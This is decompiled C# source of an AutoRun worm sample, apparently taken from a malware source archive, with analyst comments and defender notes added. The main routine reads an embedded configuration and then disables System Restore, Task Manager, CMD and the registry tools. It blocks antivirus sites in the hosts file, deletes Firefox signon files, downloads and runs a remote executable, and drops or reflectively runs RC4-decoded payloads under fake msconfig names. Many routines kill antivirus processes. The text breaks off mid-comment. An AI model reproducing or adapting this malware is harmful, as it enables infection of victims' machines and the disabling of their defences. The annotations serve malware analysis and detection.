MalwareSourceCode/MSIL/Worm/Win32/A/Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44/Form1.cs

// Decompiled with JetBrains decompiler
// Type: BCV5StuB.Form1
// Assembly: Windows, Version=7.8.9.10, Culture=neutral, PublicKeyToken=null
// MVID: 9F0D14B2-64CD-49F4-8243-2271113E9FED
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.AutoRun.hgi-f7f655882362e3de6b26b28c84c129a11a52fb9cd813ce2911fb258b72766e44.exe
using BCV5StuB.My;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace BCV5StuB
{
[DesignerGenerated]
public class Form1 : Form
{
// Designer-generated component container; released in Dispose(bool).
private IContainer components;
// Backing fields for the four designer-generated controls (default names, exposed via properties below).
[AccessedThroughProperty("Label1")]
private Label _Label1;
[AccessedThroughProperty("WebBrowser1")]
private WebBrowser _WebBrowser1;
[AccessedThroughProperty("Button1")]
private Button _Button1;
[AccessedThroughProperty("CheckBox1")]
private CheckBox _CheckBox1;
// Temp directory (Path.GetTempPath(), set in the constructor); Form1_Load uses it as the drop location for "123.exe".
private string TPath;
// Output of rc4.rc4(strArray[3], strArray[4]) in Form1_Load: the decoded main payload, held as a string.
private string filetoinject;
// Same literal ("Blackout") that Form1_Load uses to split the embedded configuration blob into fields.
// Analyst note: a repeated delimiter string in the file overlay/resource is a candidate static indicator for this builder.
private const string FileFucker = "Blackout";
// Output of rc4.rc4(strArray[6], strArray[4]) in Form1_Load: a second decoded payload, held as a string.
private string filetodo;
/// <summary>
/// Wires Form1_Load to the Load event, records the temp directory in TPath, and builds the
/// designer-generated controls. All malicious behaviour in this class starts from Form1_Load.
/// </summary>
public Form1()
{
this.Load += new EventHandler(this.Form1_Load);
this.TPath = Path.GetTempPath();
this.InitializeComponent();
}
/// <summary>
/// Standard WinForms dispose pattern: disposes the component container when called with
/// disposing == true and a container exists, and always forwards to base.Dispose.
/// </summary>
/// <param name="disposing">True when called from Dispose(), false when called from a finalizer.</param>
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
// Runs on every path, including the early return above.
base.Dispose(disposing);
}
}
/// <summary>
/// Designer-generated layout code. Creates a Label, WebBrowser, Button and CheckBox that still carry
/// their default names and captions, and adds them to the form. No event handlers are attached here.
/// </summary>
/// <remarks>
/// Analyst note: Form1_Load sets Visible and ShowInTaskbar to false, so this UI looks like leftover
/// template scaffolding rather than functionality. The point/size temporaries are decompiler output.
/// </remarks>
[DebuggerStepThrough]
private void InitializeComponent()
{
this.Label1 = new Label();
this.WebBrowser1 = new WebBrowser();
this.Button1 = new Button();
this.CheckBox1 = new CheckBox();
this.SuspendLayout();
this.Label1.AutoSize = true;
Label label1_1 = this.Label1;
Point point1 = new Point(102, 62);
Point point2 = point1;
label1_1.Location = point2;
this.Label1.Name = "Label1";
Label label1_2 = this.Label1;
Size size1 = new Size(39, 13);
Size size2 = size1;
label1_2.Size = size2;
this.Label1.TabIndex = 0;
this.Label1.Text = "Label1";
WebBrowser webBrowser1_1 = this.WebBrowser1;
point1 = new Point(169, 62);
Point point3 = point1;
webBrowser1_1.Location = point3;
WebBrowser webBrowser1_2 = this.WebBrowser1;
size1 = new Size(20, 20);
Size size3 = size1;
webBrowser1_2.MinimumSize = size3;
this.WebBrowser1.Name = "WebBrowser1";
WebBrowser webBrowser1_3 = this.WebBrowser1;
size1 = new Size(176, 162);
Size size4 = size1;
webBrowser1_3.Size = size4;
this.WebBrowser1.TabIndex = 1;
Button button1_1 = this.Button1;
point1 = new Point(199, 13);
Point point4 = point1;
button1_1.Location = point4;
this.Button1.Name = "Button1";
Button button1_2 = this.Button1;
size1 = new Size(75, 23);
Size size5 = size1;
button1_2.Size = size5;
this.Button1.TabIndex = 2;
this.Button1.Text = "Button1";
this.Button1.UseVisualStyleBackColor = true;
this.CheckBox1.AutoSize = true;
CheckBox checkBox1_1 = this.CheckBox1;
point1 = new Point(49, 139);
Point point5 = point1;
checkBox1_1.Location = point5;
this.CheckBox1.Name = "CheckBox1";
CheckBox checkBox1_2 = this.CheckBox1;
size1 = new Size(81, 17);
Size size6 = size1;
checkBox1_2.Size = size6;
this.CheckBox1.TabIndex = 3;
this.CheckBox1.Text = "CheckBox1";
this.CheckBox1.UseVisualStyleBackColor = true;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
size1 = new Size(409, 248);
this.ClientSize = size1;
this.Controls.Add((Control) this.CheckBox1);
this.Controls.Add((Control) this.Button1);
this.Controls.Add((Control) this.WebBrowser1);
this.Controls.Add((Control) this.Label1);
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (Form1);
this.Text = nameof (Form1);
this.ResumeLayout(false);
this.PerformLayout();
}
/// <summary>Designer-generated accessor for the _Label1 backing field; the setter is synchronized.</summary>
internal virtual Label Label1
{
[DebuggerNonUserCode] get => this._Label1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Label1 = value;
}
/// <summary>Designer-generated accessor for the _WebBrowser1 backing field; the setter is synchronized.</summary>
internal virtual WebBrowser WebBrowser1
{
[DebuggerNonUserCode] get => this._WebBrowser1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._WebBrowser1 = value;
}
/// <summary>Designer-generated accessor for the _Button1 backing field; the setter is synchronized.</summary>
internal virtual Button Button1
{
[DebuggerNonUserCode] get => this._Button1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._Button1 = value;
}
/// <summary>Designer-generated accessor for the _CheckBox1 backing field; the setter is synchronized.</summary>
internal virtual CheckBox CheckBox1
{
[DebuggerNonUserCode] get => this._CheckBox1;
[DebuggerNonUserCode, MethodImpl(MethodImplOptions.Synchronized)] set => this._CheckBox1 = value;
}
/// <summary>
/// Main routine of the stub. Hides the form, reads a configuration blob from the running executable
/// (ResourceReader.ReadResource, defined elsewhere), splits it on the literal "Blackout", and then
/// performs each behaviour whose boolean field is set.
/// </summary>
/// <remarks>
/// Field layout as used below (index into the split array):
///   [1] message-box text, [2] show-message flag, [3] encoded main payload, [4] second argument to
///   rc4.rc4 (presumably the key - confirm in the rc4 class), [5] second-payload flag, [6] encoded
///   second payload, [7] usb.usb_sp flag, [8] rc4.Startup flag, [9] anti-analysis / tool-termination flag,
///   [10] download-and-run flag, [11] download address, [12] DisableTaskMgr flag, [13] Firefox "signon"
///   deletion flag, [14] DisableCMD flag, [15] hosts-file flag, [16] DisableRegistryTools flag,
///   [17] DisableSR flag.
/// Host indicators visible in this method: %TEMP%\123.exe, %APPDATA%\msconfig.exe,
/// %APPDATA%\msconfig_settings.exe, the four registry values written below, and the appended hosts entries.
/// </remarks>
private void Form1_Load(object sender, EventArgs e)
{
// Keep the window off screen and out of the taskbar.
this.Visible = false;
this.ShowInTaskbar = false;
bool flag = Form1.is64Bit();
// The whole configuration, including both payloads, travels inside the executable as one delimited string.
string[] strArray = Strings.Split(Encoding.Default.GetString(ResourceReader.ReadResource(Application.ExecutablePath)), "Blackout");
string str1 = strArray[7];
string str2 = strArray[8];
string str3 = strArray[9];
string str4 = strArray[10];
string address = strArray[11];
string str5 = strArray[12];
string str6 = strArray[13];
string str7 = strArray[14];
string str8 = strArray[15];
string str9 = strArray[16];
// Inhibit system recovery: sets the DisableSR value under HKLM (needs write access to HKLM; not wrapped in try/catch).
if (Conversions.ToBoolean(strArray[17]))
MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", (object) "1", RegistryValueKind.DWord);
// Per-user policy value that blocks the registry editing tools.
if (Conversions.ToBoolean(str9))
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", (object) "1", RegistryValueKind.DWord);
// Appends loopback entries for four online scanning / vendor sites to the hosts file (hard-coded C:\Windows path).
// Defender note: monitor writes to the hosts file and alert on security-vendor names resolving to 127.0.0.1.
if (Conversions.ToBoolean(str8))
{
StreamWriter streamWriter = new StreamWriter("C:\\Windows\\System32\\drivers\\etc\\hosts", true);
string str10 = "\n 127.0.0.1 www.virustotal.com";
string str11 = "\n 127.0.0.1 www.bitdefender.com";
string str12 = "\n 127.0.0.1 www.virusscan.jotti.org";
string str13 = "\n 127.0.0.1 www.scanner.novirusthanks.org";
streamWriter.Write(str10);
streamWriter.Write("\r\n" + str11);
streamWriter.Write("\r\n" + str12);
streamWriter.Write("\r\n" + str13);
streamWriter.Close();
}
// Per-user policy value that disables the command prompt; failures are swallowed.
if (Conversions.ToBoolean(str7))
{
try
{
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", (object) "1", RegistryValueKind.DWord);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
// Deletes every file whose path contains "signon" in each Firefox profile directory of the current user.
// This is destruction of stored data, not collection: nothing is read or sent in this block.
if (Conversions.ToBoolean(str6))
{
string str14 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Mozilla\\Firefox\\Profiles";
if (Directory.Exists(str14))
{
try
{
foreach (string directory in MyProject.Computer.FileSystem.GetDirectories(str14))
{
try
{
foreach (string file in MyProject.Computer.FileSystem.GetFiles(directory))
{
if (file.Contains("signon"))
{
try
{
MyProject.Computer.FileSystem.DeleteFile(file);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
finally
{
// Decompiler artifact: the enumerator local of the foreach above was not recovered.
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
finally
{
// Decompiler artifact, as above.
IEnumerator<string> enumerator;
enumerator?.Dispose();
}
}
}
// Disables Task Manager for the current user by spawning a hidden REG command.
// Defender note: the child-process command line is directly observable in process-creation telemetry.
if (Conversions.ToBoolean(str5))
{
try
{
Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f", AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
// usb.usb_sp() is defined elsewhere; given the family name (AutoRun) this is presumably the removable-media spreader - confirm in usb.cs.
if (Conversions.ToBoolean(str1))
usb.usb_sp();
// Clears any earlier %TEMP%\123.exe, then (if configured) downloads from the configured address to that path and runs it.
if (MyProject.Computer.FileSystem.FileExists(this.TPath + "123.exe"))
MyProject.Computer.FileSystem.DeleteFile(this.TPath + "123.exe");
if (Conversions.ToBoolean(str4))
{
MyProject.Computer.Network.DownloadFile(address, this.TPath + "123.exe");
Process.Start(this.TPath + "123.exe");
}
// rc4.Startup() is defined elsewhere; the name suggests a persistence routine - confirm in the rc4 class.
if (Conversions.ToBoolean(str2))
rc4.Startup();
// Environment checks (mofo) followed by the per-product process-termination routines defined below.
if (Conversions.ToBoolean(str3))
{
Form1.mofo();
Form1.AntiAntiGen();
Form1.AntiAsquared();
Form1.AntiAvast();
Form1.AntiAVG();
Form1.AntiBullGuard();
Form1.AntiClamAV();
Form1.AntiComodo();
Form1.AntiEstNod32();
Form1.AntiEwido();
Form1.AntiFPROT6();
Form1.AntiKaspersky();
Form1.AntiMcAfee();
Form1.AntiNorton();
Form1.AntiOfficeScan();
Form1.AntiOutPost();
Form1.AntiPCCillin();
Form1.AntiServerProtect();
Form1.AntiSpySweeper();
Form1.AntiThreatExpert();
Form1.AntiVirtualPC();
Form1.AntiZoneAlarm();
}
// Second payload: decoded with rc4.rc4, written to %APPDATA%\msconfig_settings.exe and started.
// The file name imitates a Windows utility; an executable of that name under a user profile is a useful hunting lead.
if (Conversions.ToBoolean(strArray[5]))
{
this.filetodo = rc4.rc4(strArray[6], strArray[4]);
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
FileSystem.FileOpen(5, folderPath + "\\msconfig_settings.exe", OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, this.filetodo, -1L, false);
FileSystem.FileClose(5);
Process.Start(folderPath + "\\msconfig_settings.exe");
}
// Optional decoy: shows a message box with builder-supplied text.
if (Conversions.ToBoolean(strArray[2]))
{
int num = (int) Interaction.MsgBox((object) strArray[1]);
}
// Main payload. On a 64-bit OS (flag == true) the RunPE path is not attempted.
if (flag)
{
try
{
// NOTE(analyst): this method has not assigned filetoinject before this call; if it is still null,
// ScanForDotNet() throws and the catch below exits the process - confirm against the IL.
if (this.ScanForDotNet())
{
Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.runit(Conversions.ToString(a0))));
thread.TrySetApartmentState(ApartmentState.STA);
thread.Start((object) this.filetoinject);
this.Close();
}
else
{
// Drop-and-run: decoded payload written to %APPDATA%\msconfig.exe and started.
this.filetoinject = rc4.rc4(strArray[3], strArray[4]);
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
FileSystem.FileOpen(5, folderPath + "\\msconfig.exe", OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, this.filetoinject, -1L, false);
FileSystem.FileClose(5);
Process.Start(folderPath + "\\msconfig.exe");
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Environment.Exit(0);
ProjectData.ClearProjectError();
}
}
else
{
this.filetoinject = rc4.rc4(strArray[3], strArray[4]);
// Result discarded; no effect.
Encoding.Default.GetBytes(this.filetoinject);
if (this.ScanForDotNet())
{
// Payload judged to be a .NET assembly: loaded and run in-process via runit -> RunFromMemory.
Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.runit(Conversions.ToString(a0))));
thread.TrySetApartmentState(ApartmentState.STA);
thread.Start((object) this.filetoinject);
this.Close();
}
else
{
try
{
// RunPE.SRexec is defined elsewhere; it receives the payload bytes and this process's own image path.
// The class name suggests process hollowing - confirm in RunPE.cs.
new RunPE().SRexec(Encoding.Default.GetBytes(this.filetoinject), Process.GetCurrentProcess().MainModule.FileName);
}
catch (Exception ex1)
{
ProjectData.SetProjectError(ex1);
try
{
// Fallback when SRexec throws: drop to %APPDATA%\msconfig.exe and start it.
this.filetoinject = rc4.rc4(strArray[3], strArray[4]);
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
FileSystem.FileOpen(5, folderPath + "\\msconfig.exe", OpenMode.Binary, OpenAccess.ReadWrite);
FileSystem.FilePut(5, this.filetoinject, -1L, false);
FileSystem.FileClose(5);
Process.Start(folderPath + "\\msconfig.exe");
}
catch (Exception ex2)
{
ProjectData.SetProjectError(ex2);
Environment.Exit(0);
ProjectData.ClearProjectError();
}
ProjectData.ClearProjectError();
}
}
}
}
/// <summary>
/// Returns true when the ProgramW6432 environment variable is non-empty, which the sample uses as
/// its test for a 64-bit operating system.
/// </summary>
public static bool is64Bit() => Operators.CompareString(Environment.GetEnvironmentVariable("ProgramW6432"), "", false) != 0;
/// <summary>
/// Sandbox check keyed on a window title: if the supplied form's Text contains "#", the form is
/// closed and the application ended. Not called from any code visible in this file.
/// </summary>
/// <param name="frmSelect">Form whose title text is inspected.</param>
/// <remarks>
/// The labels, num1/num2/num3 bookkeeping and the filtered catch appear to be the decompiler's
/// rendering of a VB "On Error Resume Next" block; the effective logic is only the Text check.
/// Analyst note: Sandboxie is known to decorate window titles with '#', which is presumably what
/// this looks for.
/// </remarks>
public static void AntiSandboxie(Form frmSelect)
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_1:
int num3 = 2;
if (!frmSelect.Text.Contains("#"))
goto label_9;
label_2:
num3 = 3;
frmSelect.Close();
ProjectData.EndApp();
goto label_9;
label_4:
// Resume dispatcher: jumps to the statement after the one that raised.
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
case 5:
case 6:
goto label_9;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_4;
}
throw ProjectData.CreateProjectError(-2146828237);
label_9:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "mcagentmcuimgr" (ordinal comparison). Kill() is not guarded.
/// </summary>
/// <remarks>
/// Analyst note: the literal looks like two process names run together, so an exact match is
/// implausible; treat the string as a static indicator rather than evidence of an effective kill.
/// </remarks>
public static void AntiMcAfee()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mcagentmcuimgr", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "avgemc" (ordinal comparison). Kill() is not guarded, so an
/// access-denied failure propagates to the caller.
/// </summary>
/// <remarks>Defender note: unexpected exit of a protection process is a tamper signal worth alerting on.</remarks>
public static void AntiAVG()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avgemc", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "a2servic" (ordinal comparison). Kill() is not guarded.
/// </summary>
public static void AntiAsquared()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "a2servic", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Loads a managed assembly from a byte array and invokes its entry point in the current process,
/// passing a single-element string array { "1" } as the argument.
/// </summary>
/// <param name="bytes">Raw assembly image (the decoded payload supplied by runit).</param>
/// <remarks>
/// Defender note: the payload is never written to disk on this path (reflective code loading), so
/// file-based scanning does not see it; .NET runtime assembly-load telemetry and in-memory
/// scanning are the relevant detection points.
/// The nested RuntimeHelpers.GetObjectValue calls are VB compiler/decompiler boilerplate.
/// </remarks>
private void RunFromMemory(byte[] bytes)
{
Assembly assembly = Assembly.Load(bytes);
MethodInfo entryPoint = assembly.EntryPoint;
// Instance is created by looking up a type named after the entry-point method.
object objectValue = RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(assembly.CreateInstance(entryPoint.Name))));
entryPoint.Invoke(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(objectValue))), new object[1]
{
(object) new string[1]{ "1" }
});
}
/// <summary>
/// Converts the payload string back to bytes using code page 1252, starts an STA thread that hands
/// those bytes to RunFromMemory, and closes the form.
/// </summary>
/// <param name="split">Decoded payload carried as a string (one character per byte).</param>
public void runit(string split)
{
byte[] bytes = Encoding.GetEncoding(1252).GetBytes(split);
Thread thread = new Thread((ParameterizedThreadStart) (a0 => this.RunFromMemory((byte[]) a0)));
thread.TrySetApartmentState(ApartmentState.STA);
thread.Start((object) bytes);
this.Close();
}
/// <summary>
/// Heuristic used to choose the execution path: returns false when the decoded payload does not
/// contain "&lt;/assembly&gt;"; otherwise returns true when the text following the first occurrence
/// of that marker is non-empty.
/// </summary>
/// <returns>True when the caller should treat the payload as a managed assembly.</returns>
/// <remarks>
/// Dereferences filetoinject without a null check. The unassigned local "flag" is a decompiler
/// artifact and contributes nothing to the result.
/// </remarks>
private bool ScanForDotNet()
{
if (!this.filetoinject.Contains("</assembly>"))
return false;
bool flag;
return Operators.CompareString(Strings.Split(this.filetoinject, "</assembly>")[1].ToLower(), "", false) != 0 || flag;
}
/// <summary>
/// Security-tool termination routine: enumerates all processes and calls Kill() on any whose
/// lower-cased name equals "ashWebSv" (ordinal comparison).
/// </summary>
/// <remarks>
/// Analyst note: the name is lower-cased before an ordinal comparison against a mixed-case literal,
/// so as decompiled the comparison cannot succeed; treat the string as a static indicator.
/// </remarks>
public static void AntiAvast()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ashWebSv", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "clamauto" (ordinal comparison). Kill() is not guarded.
/// </summary>
public static void AntiClamAV()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "clamauto", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "cpf" (ordinal comparison). Kill() is not guarded.
/// </summary>
public static void AntiComodo()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "cpf", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "ewido" (ordinal comparison). Kill() is not guarded.
/// </summary>
public static void AntiEwido()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ewido", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination routine: enumerates all processes and calls Kill() on any whose
/// lower-cased name equals "FPAVServer" (ordinal comparison).
/// </summary>
/// <remarks>
/// Analyst note: the name is lower-cased before an ordinal comparison against a mixed-case literal,
/// so as decompiled the comparison cannot succeed; treat the string as a static indicator.
/// </remarks>
public static void AntiFPROT6()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "FPAVServer", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "kavsvc" (ordinal comparison). Kill() is not guarded.
/// </summary>
public static void AntiKaspersky()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "kavsvc", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination routine: enumerates all processes and calls Kill() on any whose
/// lower-cased name equals "BullGuard" (ordinal comparison).
/// </summary>
/// <remarks>
/// Analyst note: the name is lower-cased before an ordinal comparison against a mixed-case literal,
/// so as decompiled the comparison cannot succeed; treat the string as a static indicator.
/// </remarks>
public static void AntiBullGuard()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "BullGuard", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination routine: enumerates all processes and calls Kill() on any whose
/// lower-cased name equals "VSMON" (ordinal comparison).
/// </summary>
/// <remarks>
/// Analyst note: the name is lower-cased before an ordinal comparison against an upper-case literal,
/// so as decompiled the comparison cannot succeed; treat the string as a static indicator.
/// </remarks>
public static void AntiZoneAlarm()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "VSMON", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "antigen" (ordinal comparison). Kill() is not guarded.
/// </summary>
public static void AntiAntiGen()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "antigen", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "ccapp" (ordinal comparison). Kill() is not guarded.
/// </summary>
public static void AntiNorton()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ccapp", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "tmlisten" (ordinal comparison). Kill() is not guarded.
/// </summary>
public static void AntiOfficeScan()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "tmlisten", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "pccntmon" (ordinal comparison). Kill() is not guarded.
/// </summary>
public static void AntiPCCillin()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "pccntmon", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "earthagent" (ordinal comparison). Kill() is not guarded.
/// </summary>
public static void AntiServerProtect()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "earthagent", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination (Impair Defenses, T1562.001): enumerates all processes and calls Kill()
/// on any whose lower-cased name equals "spysweeper" (ordinal comparison). Kill() is not guarded.
/// </summary>
public static void AntiSpySweeper()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "spysweeper", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Enumerates all processes and calls Kill() on any whose lower-cased name equals "vpcmapvmsrvc"
/// (ordinal comparison). Unlike the environment checks in mofo(), this routine terminates the
/// matched process rather than exiting the sample.
/// </summary>
/// <remarks>
/// Analyst note: the literal looks like two names run together, so an exact match is implausible;
/// treat the string as a static indicator.
/// </remarks>
public static void AntiVirtualPC()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "vpcmapvmsrvc", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination routine: enumerates all processes and calls Kill() on any whose
/// lower-cased name equals "acs.exe" (ordinal comparison).
/// </summary>
/// <remarks>
/// Analyst note: Process.ProcessName does not include the ".exe" extension, so this comparison is
/// unlikely to match; treat the string as a static indicator.
/// </remarks>
public static void AntiOutPost()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "acs.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// Security-tool termination routine: enumerates all processes and calls Kill() on any whose
/// lower-cased name equals "nod32.exenod32krn.exeekrn.exe" (ordinal comparison).
/// </summary>
/// <remarks>
/// Analyst note: the literal is three file names run together and includes ".exe", which
/// Process.ProcessName does not carry, so a match is implausible; treat it as a static indicator.
/// </remarks>
public static void AntiEstNod32()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "nod32.exenod32krn.exeekrn.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
/// <summary>
/// P/Invoke declaration for user32!FindWindowA (ANSI). Used by IsVmWare() to look up a top-level
/// window by class name. The decompiled signature declares the return value as long.
/// </summary>
[DllImport("user32", EntryPoint = "FindWindowA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long FindWindow([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpClassName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpWindowName);
/// <summary>
/// Runs the anti-analysis sequence: terminates processes whose names contain "MSASCui" or "msmpeng",
/// then runs the Sandboxie, VMware, file-name, user-name and computer-name checks, each of which
/// may end the process with Environment.Exit(0).
/// </summary>
/// <remarks>
/// Defender note (Virtualization/Sandbox Evasion, T1497): a sample that exits cleanly with code 0
